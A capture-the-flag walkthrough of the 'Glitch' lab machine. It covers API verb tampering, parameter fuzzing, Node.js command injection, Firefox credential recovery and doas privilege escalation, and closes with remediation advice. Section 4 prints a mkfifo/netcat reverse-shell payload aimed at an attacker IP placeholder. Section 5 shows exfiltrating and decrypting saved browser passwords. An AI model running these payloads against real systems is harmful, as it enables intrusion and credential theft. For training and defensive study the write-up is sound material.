Target IP: glitch.thm (Requires /etc/hosts entry) Difficulty: Easy/Medium Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

“Glitch” is a Node.js-based web server. Initial access requires a multi-step enumeration process involving API fuzzing and HTTP Verb Tampering. Access is gained by injecting a command into a vulnerable API endpoint to execute a reverse shell. Lateral movement leverages credentials recovered from a Firefox profile (firefox_decrypt). Privilege escalation is achieved by exploiting Doas, a lightweight alternative to Sudo, which was misconfigured to allow the user to run commands as root.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Fuzzing API parameters and HTTP methods.
  • T1059.007 (JavaScript): Exploiting Node.js Command Injection.
  • T1555 (Credentials from Password Stores): Decrypting Firefox saved passwords.
  • T1548 (Abuse Elevation Control Mechanism): Exploiting doas configuration.

2. Operational Setup

Host Configuration

echo "10.10.x.x glitch.thm" | sudo tee -a /etc/hosts

3. Enumeration: “The API Hunt”

A. Network Scanning

Nmap reveals only one port:

  • 80/tcp (HTTP): Node.js Express server (likely).

B. Web Enumeration

  1. Access Token: Viewing the source code or a javascript file (often script.js or similar) reveals a logic where a cookie named token is required.
  • Action: Set cookie token=value (often found in local storage or source).
  • Result: Access to the main dashboard.
  1. API Discovery: The dashboard makes calls to /api/items.
  • GET /api/items: Returns a list of items.
  • Hint: “Use other HTTP verbs.”

C. HTTP Verb Tampering

We fuzz the HTTP methods on /api/items.

curl -X POST http://glitch.thm/api/items
curl -X OPTIONS http://glitch.thm/api/items
  • Finding: The POST method is valid but requires a specific parameter.

D. Parameter Fuzzing

We fuzz the parameters for the POST request.

ffuf -u http://glitch.thm/api/items -X POST -d "FUZZ=test" -w /usr/share/wordlists/dirb/common.txt
  • Result: cmd (or command).

4. Initial Access: Node.js RCE

The Vulnerability

The /api/items endpoint takes the cmd parameter and likely passes it to eval() or child_process.exec() on the backend. This is Server-Side Javascript Injection (SSJI) or simply Command Injection.

The Payload

You noted that standard Node.js reverse shells failed, but mkfifo worked. This suggests the server might be filtering specific characters or running in a limited environment, but standard shell commands are passed through.

Payload (URL Encoded):

# POST Body:
cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.YOUR.IP 4444 >/tmp/f

Execution:

curl -X POST http://glitch.thm/api/items -d "cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.YOUR.IP 4444 >/tmp/f"

Status: Shell as user.


5. Lateral Movement: Firefox Forensics

Enumeration

linpeas.sh failed (likely due to Node environment restrictions or missing tools like curl/wget on the box). Manual enumeration revealed a hidden folder: ~/.firefox.

The Vulnerability

Firefox stores saved passwords in logins.json and key4.db (encryption key). If we have these files, we can decrypt the passwords offline.

Exploitation

  1. Exfiltration: Zip or tar the .firefox folder and download it to your attacker machine.
# On target
tar -czf firefox.tar.gz .firefox
# On attacker (using nc or python server to catch it)
  1. Decryption: Tool: firefox_decrypt
python3 firefox_decrypt.py /path/to/downloaded/firefox/profile
  1. Result:
  • User: v0id
  • Password: [REDACTED] (Recovered from Firefox).

Access:

su v0id
# Password: ...

6. Privilege Escalation: Doas

Enumeration

Checking for standard sudo privileges (sudo -l) might show nothing or command not found. However, checking for doas:

find / -name doas 2>/dev/null
# or check config
cat /etc/doas.conf
  • Config: permit v0id as root (or similar).

What is Doas? doas is the OpenBSD alternative to sudo. It is much simpler but achieves the same goal: executing commands as another user.

Exploitation

Since the config permits v0id to run commands as root:

doas /bin/bash

Note: You might need to enter v0id’s password.

Result:

# whoami
root

Root Flag: /root/root.txt.


7. Remediation (Blue Team)

  1. API Security:
  • Restrict HTTP verbs (methods) that are not required. If the API only reads data, disable POST.
  • Input Validation: Never pass user input (cmd) directly to exec() or eval(). Use sanitized inputs or specific API functions.
  1. Endpoint Security:
  • Firefox Profiles: Users should not store corporate or system credentials in browser password managers on servers. Use a dedicated Secrets Management solution.
  1. Doas/Sudo:
  • Restrict doas or sudo to specific commands/scripts rather than allowing a full shell (/bin/bash) or generic root access.